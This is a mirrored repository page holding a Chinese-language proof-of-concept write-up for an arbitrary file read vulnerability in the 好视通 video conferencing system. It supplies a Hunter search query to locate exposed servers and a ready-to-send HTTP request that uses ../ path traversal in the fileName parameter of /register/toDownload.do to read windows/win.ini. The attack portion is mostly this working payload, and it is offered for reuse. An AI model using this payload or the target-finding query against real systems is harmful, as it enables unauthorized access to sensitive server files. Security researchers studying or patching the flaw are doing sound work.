admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/好视通/好视通视频会议系统存在任意文件读取漏洞.md

26 lines
1.2 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 好视通视频会议系统存在任意文件读取漏洞
# 一、漏洞简介
<font style="color:rgb(51, 51, 51);">好视通视频会议是由深圳市华视瑞通信息技术有限公司开发其在国内率先推出了3G互联网视频会议并成功应用于SAAS领域。好视通视频会议系统存在任意文件读取漏洞攻击者可通过该漏洞获取敏感信息。</font>
# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
+ 好视通视频会议系统
# 三、资产测绘
+ hunter`app.name="好视通 Server Management System"`
+ 特征![1700702275984-2d23da89-0111-4006-a5ce-874a3a2d9fd8.png](./img/SGtAAjB6Vw--6aV5/1700702275984-2d23da89-0111-4006-a5ce-874a3a2d9fd8-049119.png)
# 四、漏洞复现
```python
GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```
![1700702314990-271b30ee-3c76-46b3-8671-216dcfaf4416.png](./img/SGtAAjB6Vw--6aV5/1700702314990-271b30ee-3c76-46b3-8671-216dcfaf4416-185423.png)
> 更新: 2024-02-29 23:55:44
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsb2m9xvhebci1ix>
Reference in New Issue Copy Permalink